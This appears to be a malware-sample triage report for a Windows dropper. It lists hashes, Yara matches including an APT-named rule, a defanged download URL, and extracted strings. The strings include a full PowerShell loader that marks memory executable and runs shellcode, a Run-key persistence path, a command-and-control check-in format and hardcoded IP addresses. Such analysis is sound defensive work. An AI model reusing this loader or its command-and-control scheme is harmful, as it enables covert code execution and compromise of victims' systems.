Sample details: c042511df4ce1f0305fb0cb1b84780a9

Hashes
MD5: c042511df4ce1f0305fb0cb1b84780a9
SHA1: 3095111f886fb02656ba8d02b5823ebfe98234d0
SHA256: c831f7db89b27c0b0fdbc47e106eebbd041a413589e1b4d7ac85b769382e6285
SSDEEP: 384:VQTLexvisKcTlJvnzlXI2P2YNoGP5PW+qxHGmBK6gbqinjYp:GTav5lpzlY2/RPxqdGn6gbqu
Details
File Type: PE32
Added: 2018-03-07 02:52:46
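Yara Hits (signature matches on this file; rule names, including actor-named rules, are triage leads and not confirmed attribution)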
YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasOverlay | YRP/HasRichSignature | YRP/powershell | YRP/maldoc_find_kernel32_base_method_1 | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/System_Tools | YRP/Antivirus | YRP/Dropper_Strings | YRP/network_dropper | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/suspicious_packer_section | FlorianRoth/DragonFly_APT_Sep17_3 |
Source (download location, defanged)
hxxp://94[.]130[.]104[.]170/unpacked_dropper.ex_
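Strings (raw extraction from the sample; the {ps_...} tokens are unfilled template placeholders, and the broken fragments after the .MPRESS1/.MPRESS2 section names are consistent with packed data)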
		!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
SVWj<_W3
D$$PSS
PVhP1@
PVVVVVVV
hjkXjef
D$,d;@
D$,x;@
D$$H>@
D$ PSh?
D$ PSh?
D$XPh?
D$dPSSSSSSh
D$ _^[
%s %s HTTP/1.0
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %u
IsWow64Process
kernel32
Wow64DisableWow64FsRedirection
%1d.%1d.%04d_%1d.%1d
%x%x%x%x%x%x
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
%[^,],
type=%s&version=1.0&aid=%s&builddate=%s&id=%s&os=%s_%s
http://%s/q
software\microsoft\net framework setup\ndp\v2.0.50727
%windir%\system32\windowspowershell\v1.0\powershell.exe
function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("MyDelegateType","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split("\\")[-1].Equals("System.dll")};$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String("{ps_shellcode}");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);
{ps_code_var1}
{ps_code_var2}
{ps_code_var3}
{ps_code_var4}
{ps_code_var5}
{ps_shellcode}
{ps_shellcode_length}
error_%u_%x_%x
software\microsoft\windows\currentversion\run
%[^;];%[^;];%[^;];%[^;];%s
install
CloseHandle
GetProcAddress
GetLastError
VirtualAlloc
VirtualFree
GetModuleHandleA
GetVersionExA
GetTickCount
CopyFileA
CreateProcessA
DeleteFileA
MoveFileExA
ExpandEnvironmentStringsA
GetTempPathW
CopyFileW
WaitForSingleObject
DeleteFileW
ExpandEnvironmentStringsW
CreateProcessW
GetExitCodeProcess
OpenEventA
GetModuleFileNameA
ExitProcess
KERNEL32.dll
RtlAdjustPrivilege
_vsnprintf
_snprintf
RtlRandom
sscanf
strncpy
strncat
_snwprintf
ZwSetValueKey
ZwCreateKey
strstr
ntdll.dll
WS2_32.dll
StrStrIA
SHGetValueA
PathFileExistsA
PathAppendW
PathFindFileNameW
SHLWAPI.dll
URLDownloadToCacheFileW
urlmon.dll
UuidCreateSequential
RPCRT4.dll
InternetCrackUrlA
WININET.dll
OpenProcessToken
GetTokenInformation
RegOpenKeyExA
RegSetKeySecurity
RegCloseKey
GetSidSubAuthority
GetSidSubAuthorityCount
RegCreateKeyExA
RegSetValueExW
RegFlushKey
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
OleInitialize
CoCreateInstance
ole32.dll
OLEAUT32.dll
memset
_chkstk
060414;8;178.89.159.34,178.89.159.35;1
!Win32 .DLL.
.MPRESS1
.MPRESS2
v2.19+#Q 
aeg@4$
OGBBq\@R
808L@0
~9h`M*0bL
WIW$PA
,stu5u
 SSSQ3
uC*	0B
Psj<_Z
UH	$PSSD
_gN,.21
ntdll@.
QuerAy<[W
PathUn
quoteSpa
CmpNI$#
RPCRT4
heckSumM
appe1!
USERENV
Temp-p@
Count0aU
Errorit	0A
ER#eg5\ExW8
#yl<U#Q
HTTP/1.0
Host:H0
Type: V!
ww-form-
urlenc2
|Length]
IsWow64~
tware\cl
alserv0er
02B4-09C
A-4bb6-B
78D-A8F5
9079A8D5
M`micrIo4
&H!tmp
S2g2 V
%s %s HTTP/1.0
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %u
_beginthreadex
msvcrt.dll
IsWow64Process
kernel32
%1d.%1d.
GetModuleHandleA
GetProcAddress
KERNEL32.DLL
ntdll.dll
WS2_32.dll
SHLWAPI.dll
StrStrA
WININET.dll
InternetCrackUrlA
RPCRT4.dll
UuidCreateSequential
imagehlp.dll
CheckSumMappedFile
USERENV.dll
CreateEnvironmentBlock
ADVAPI32.dll
RegCloseKey
ole32.dll
CoInitialize
t7Kt'Kt
050@0u0
2.2I2b2u2{2
353E3]3g3z3
394N4 5-5
6%676[6
7,7>7F:N:S:Y:^:
;8;d;m;{;
<!<0<5<H<n<
<2=M=T=^=g=
>/>=>K>b>
?8?>?L?c?i?p?
0$0?0P0X0e0m0s0x0
232A2O2U2g2l2v2{2
3!3&32373<3A3F3L3d3j3o3
4,42494>4[4s4z4